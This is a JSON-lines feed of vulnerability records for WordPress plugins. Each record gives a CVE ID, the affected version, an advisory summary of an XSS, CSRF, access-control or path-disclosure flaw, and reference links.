{"CVE_ID":"CVE-2023-2168","slug":"simple-tags","versionImpact":"3.6.4","description":"The TaxoPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Suggest Terms Title field in versions up to, and including, 3.6.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with Editor+ permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2868795%40simple-tags%2Ftrunk&old=2774153%40simple-tags%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2868795%40simple-tags%2Ftrunk&old=2774153%40simple-tags%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-tags\\\/trunk\\\/inc\\\/suggestterms-functions.php?rev=2743620#L151\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-tags\\\/trunk\\\/inc\\\/suggestterms-functions.php?rev=2743620#L151\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c051bfd-2754-4faf-8062-91752555166c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c051bfd-2754-4faf-8062-91752555166c?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-34172","slug":"wordpress-social-login","versionImpact":"3.0.4","description":"Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Miled WordPress Social Login plugin <=\u00a03.0.4 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wordpress-social-login\\\/wordpress-wordpress-social-login-plugin-3-0-4-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wordpress-social-login\\\/wordpress-wordpress-social-login-plugin-3-0-4-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-34573","slug":"pootle-page-builder","versionImpact":"5.7.1","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Pootlepress Pootle Pagebuilder \u2013 WordPress Page builder allows Stored XSS.This issue affects Pootle Pagebuilder \u2013 WordPress Page builder: from n\/a through 5.7.1.\n\n","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/pootle-page-builder\\\/wordpress-pootle-pagebuilder-plugin-5-7-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/pootle-page-builder\\\/wordpress-pootle-pagebuilder-plugin-5-7-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6591","slug":"ultimate-auction","versionImpact":"4.2.6","description":"The Ultimate WordPress Auction Plugin plugin for WordPress is vulnerable to unauthorized email creation and sending due to a missing capability check on the 'send_auction_email_callback' and 'resend_auction_email_callback' functions in all versions up to, and including, 4.2.6. This makes it possible for unauthenticated attackers to craft emails that include links and send to any email address.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/534a5d1d-cc34-4d84-b3a3-bf2282718656?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/534a5d1d-cc34-4d84-b3a3-bf2282718656?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-auction\\\/trunk\\\/ultimate-auction.php#L93\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-auction\\\/trunk\\\/ultimate-auction.php#L93\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-auction\\\/trunk\\\/ultimate-auction.php#L119\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-auction\\\/trunk\\\/ultimate-auction.php#L119\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10108","slug":"wpadverts","versionImpact":"2.1.6","description":"The WPAdverts \u2013 Classifieds Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's adverts_add shortcode in all versions up to, and including, 2.1.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8b213c3b-3907-47d9-9826-379936f15078?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8b213c3b-3907-47d9-9826-379936f15078?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpadverts\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpadverts\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3178088\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3178088\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9851","slug":"tour-operator","versionImpact":"1.4.9","description":"The LSX Tour Operator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.4.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/tour-operator\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/tour-operator\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/08ef71da-50f2-4f7e-8a23-23adbabee09d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/08ef71da-50f2-4f7e-8a23-23adbabee09d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1508","slug":"wp-crowdfunding","versionImpact":"2.1.13","description":"The WP Crowdfunding plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the download_data action in all versions up to, and including, 2.1.13. This makes it possible for authenticated attackers, with subscriber-level access and above, to download all of a site's post content when WooCommerce is installed.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-crowdfunding\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-crowdfunding\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/70a93afa-9801-41d2-8923-ca4ae6ae974f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/70a93afa-9801-41d2-8923-ca4ae6ae974f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-31776","slug":"uptime-robot-monitor","versionImpact":"2.3","description":"Cross-Site Request Forgery (CSRF) vulnerability in Aphotrax Uptime Robot Plugin for WordPress allows Cross Site Request Forgery. This issue affects Uptime Robot Plugin for WordPress: from n\/a through 2.3.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/uptime-robot-monitor\\\/vulnerability\\\/wordpress-uptime-robot-plugin-2-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/uptime-robot-monitor\\\/vulnerability\\\/wordpress-uptime-robot-plugin-2-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3858","slug":"formality","versionImpact":"1.5.8","description":"The Formality plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018align\u2019 parameter in all versions up to, and including, 1.5.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/formality\\\/trunk\\\/public\\\/class-formality-form.php#L137\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/formality\\\/trunk\\\/public\\\/class-formality-form.php#L137\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3285036\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3285036\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/formality\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/formality\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e25157d3-42ac-4dd6-a736-5623a16e5629?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e25157d3-42ac-4dd6-a736-5623a16e5629?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12725","slug":"clasify-classified-listing","versionImpact":"1.0.7","description":"The Clasify Classified Listing WordPress plugin through 1.0.7 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a174c640-6994-4028-a8a3-c470d5612304\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a174c640-6994-4028-a8a3-c470d5612304\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4355","slug":"usc-e-shop","versionImpact":"2.2.7","description":"The Welcart e-Commerce plugin for WordPress is vulnerable to authorization bypass due to missing capability checks on the download_orderdetail_list(), change_orderlist(), and download_member_list() functions called via admin_init hooks in versions up to, and including, 2.2.7. This makes it possible for unauthenticated attackers to download lists of members, products and orders.","refs":"[{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-welcart-e-commerce-plugin-fixed-vulnerabilities\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-welcart-e-commerce-plugin-fixed-vulnerabilities\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/671f5ba5-1f18-49fa-aa97-eaebdb3417bb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/671f5ba5-1f18-49fa-aa97-eaebdb3417bb?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36748","slug":"dokan-lite","versionImpact":"3.0.8","description":"The Dokan plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.0.8. This is due to missing or incorrect nonce validation on the handle_order_export() function. This makes it possible for unauthenticated attackers to trigger an order export via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/894c875a-078f-4c1f-83d2-4a6e4a309c3e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/894c875a-078f-4c1f-83d2-4a6e4a309c3e?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2368433\\\/dokan-lite\\\/trunk\\\/includes\\\/Dashboard\\\/Templates\\\/Orders.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2368433\\\/dokan-lite\\\/trunk\\\/includes\\\/Dashboard\\\/Templates\\\/Orders.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-34023","slug":"wordpress-social-login","versionImpact":"3.0.4","description":"Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in Miled WordPress Social Login plugin <=\u00a03.0.4 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wordpress-social-login\\\/wordpress-wordpress-social-login-plugin-3-0-4-cross-site-scripting-xss-vulnerability-2?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wordpress-social-login\\\/wordpress-wordpress-social-login-plugin-3-0-4-cross-site-scripting-xss-vulnerability-2?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6573","slug":"intelligence","versionImpact":"1.4.0","description":"The Intelligence plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 1.4.0. This is due the plugin not preventing direct access to the \/vendor\/levelten\/intel\/realtime\/index.php file and display_errors being enabled. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b5aa0222-1e70-4c06-860f-77643da4356c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b5aa0222-1e70-4c06-860f-77643da4356c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/intelligence\\\/trunk\\\/vendor\\\/levelten\\\/intel\\\/realtime\\\/index.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/intelligence\\\/trunk\\\/vendor\\\/levelten\\\/intel\\\/realtime\\\/index.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/intelligence\\\/trunk\\\/vendor\\\/levelten\\\/intel\\\/realtime\\\/settings.php#L12\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/intelligence\\\/trunk\\\/vendor\\\/levelten\\\/intel\\\/realtime\\\/settings.php#L12\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7426","slug":"peepso-core","versionImpact":"6.4.6.0","description":"The Community by PeepSo \u2013 Social Network, Membership, Registration, User Profiles plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 6.4.6.0. This is due to the plugin displaying errors and allowing direct access to the sse.php file. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e69d666-50de-4c82-9ad4-9ed40fcc7218?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e69d666-50de-4c82-9ad4-9ed40fcc7218?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/peepso-core\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/peepso-core\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1410","slug":"pie-calendar","versionImpact":"1.2.5","description":"The Events Calendar Made Simple \u2013 Pie Calendar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's piecal shortcode in all versions up to, and including, 1.2.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3243992\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3243992\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pie-calendar\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pie-calendar\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fcaea2fb-ebf8-49b4-8cd5-0d9208252a90?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fcaea2fb-ebf8-49b4-8cd5-0d9208252a90?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-31735","slug":"footnotes-for-wordpress","versionImpact":"2016.1230","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in C. Johnson Footnotes for WordPress allows Stored XSS. This issue affects Footnotes for WordPress: from n\/a through 2016.1230.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/footnotes-for-wordpress\\\/vulnerability\\\/wordpress-footnotes-for-wordpress-plugin-2016-1230-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/footnotes-for-wordpress\\\/vulnerability\\\/wordpress-footnotes-for-wordpress-plugin-2016-1230-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3748","slug":"taxonomy-chain-menu","versionImpact":"1.0.8","description":"The Taxonomy Chain Menu plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's pn_chain_menu shortcode in all versions up to, and including, 1.0.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/taxonomy-chain-menu\\\/trunk\\\/index.php#L190\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/taxonomy-chain-menu\\\/trunk\\\/index.php#L190\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3284354\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3284354\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/taxonomy-chain-menu\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/taxonomy-chain-menu\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/25afc28c-2814-4b49-add5-1d0ce5ff3a07?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/25afc28c-2814-4b49-add5-1d0ce5ff3a07?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12724","slug":"wp-desklite","versionImpact":"1.0.0","description":"The WP DeskLite  WordPress plugin through 1.0.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9dd3ffaa-9020-47a6-bf9a-7e1412b9e9d5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9dd3ffaa-9020-47a6-bf9a-7e1412b9e9d5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7667","slug":"restrict-file-access","versionImpact":"1.1.2","description":"The Restrict File Access plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.2. This is due to missing or incorrect nonce validation on the 'restrict-file-access' page. This makes it possible for unauthenticated attackers to to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php), via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/restrict-file-access\\\/trunk\\\/admin\\\/admin.php#L78\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/restrict-file-access\\\/trunk\\\/admin\\\/admin.php#L78\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e1105717-134b-48cc-960d-f78437c06793?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e1105717-134b-48cc-960d-f78437c06793?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36747","slug":"sidebar-manager","versionImpact":"1.1.4","description":"The Lightweight Sidebar Manager plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.1.4. This is due to missing or incorrect nonce validation on the metabox_save() function. This makes it possible for unauthenticated attackers to save metbox data via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2368387%40sidebar-manager&new=2368387%40sidebar-manager&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2368387%40sidebar-manager&new=2368387%40sidebar-manager&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/844c5012-f823-46ae-8de2-e2803b7cd063?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/844c5012-f823-46ae-8de2-e2803b7cd063?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1982","slug":"front-editor","versionImpact":"4.0.4","description":"The Front Editor WordPress plugin through 4.0.4 does not sanitize and escape some of its form settings, which could allow high-privilege users to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/51987966-8007-4e12-bc2e-997b92054739\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/51987966-8007-4e12-bc2e-997b92054739\",\"refsource\":\"MISC\",\"tags\":[]}]"}
